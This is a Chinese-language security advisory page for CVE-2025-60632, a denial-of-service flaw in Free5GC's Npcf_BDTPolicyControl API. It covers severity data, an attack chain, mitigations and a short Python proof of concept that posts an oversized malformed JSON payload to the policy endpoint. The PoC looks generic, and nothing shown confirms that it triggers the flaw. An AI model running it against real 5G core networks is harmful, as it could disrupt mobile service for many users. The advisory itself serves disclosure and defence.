IPBUF安全漏洞报告
English
CVE-2025-60632 CVSS 6.5 中危

CVE-2025-60632 Free5GC Npcf_BDTPolicyControl API拒绝服务漏洞

披露日期: 2025-11-24

漏洞信息

漏洞编号
CVE-2025-60632
漏洞类型
拒绝服务
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Free5GC

相关标签

拒绝服务Free5GC5G核心网API安全Npcf_BDTPolicyControlCVE-2025-60632

漏洞概述

CVE-2025-60632是Free5GC v4.0.0和v4.0.1版本中存在的拒绝服务漏洞。该漏洞位于Npcf_BDTPolicyControl API组件中,攻击者通过发送精心构造的POST请求,可以导致服务中断。由于Free5GC是5G核心网的关键组成部分,承载着移动网络的核心功能,此漏洞可能影响5G网络的稳定性和可靠性。攻击具有网络可达性,无需认证即可发起,但需要一定的用户交互。CVSS评分6.5反映出该漏洞的可用性影响较高,但机密性和完整性影响较低。建议受影响用户及时更新至最新版本或应用官方发布的安全补丁。

技术细节

Free5GC是一个开源的5G核心网实现,Npcf_BDTPolicyControl是用于处理背景数据传输策略的控制服务。漏洞源于API端点对POST请求参数验证不充分,攻击者可以构造异常的数据结构或超长的字段值触发处理逻辑错误。当恶意请求到达Npcf_BDTPolicyControl服务后,可能导致进程崩溃、服务无响应或资源耗尽。由于该服务通常是5G核心网中的关键组件,其不可用会影响注册、认证和数据传输等核心流程。攻击者可以利用自动化工具批量发送恶意请求,在短时间内造成大规模服务中断。建议在API网关层面实现输入验证和速率限制,并监控异常请求模式。

攻击链分析

STEP 1
1
攻击者识别目标Free5GC实例的网络地址
STEP 2
2
构造包含异常数据结构的POST请求到Npcf_BDTPolicyControl API
STEP 3
3
发送恶意请求,触发API处理逻辑错误
STEP 4
4
导致Npcf_BDTPolicyControl服务进程崩溃或资源耗尽
STEP 5
5
5G核心网服务中断,影响用户注册和业务数据传输

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # CVE-2025-60632 PoC - Free5GC Npcf_BDTPolicyControl DoS target_url = "http://target-ip:5000/npcf-bdtpolicycontrol/v1/policies" def exploit_cve_2025_60632(): # Malformed POST request to trigger DoS payload = { "invalid": "A" * 10000, # Oversized payload "nested": {"key": "value"}, "bdtPolicyId": "malformed_data" } headers = { "Content-Type": "application/json", "User-Agent": "CVE-2025-60632-PoC" } try: response = requests.post(target_url, json=payload, headers=headers, timeout=5) print(f"Response Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") if __name__ == "__main__": exploit_cve_2025_60632()

影响范围

Free5GC < 4.0.2
Free5GC v4.0.0
Free5GC v4.0.1

防御指南

临时缓解措施
在官方补丁发布前,可通过以下措施临时缓解风险:1) 在负载均衡器或API网关配置输入验证规则,拒绝超长字段和异常数据格式;2) 对Npcf_BDTPolicyControl API端点实施请求速率限制;3) 启用详细的访问日志并配置告警机制;4) 考虑临时禁用非必要的BDT策略控制功能;5) 使用网络ACL限制对该服务的访问来源。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表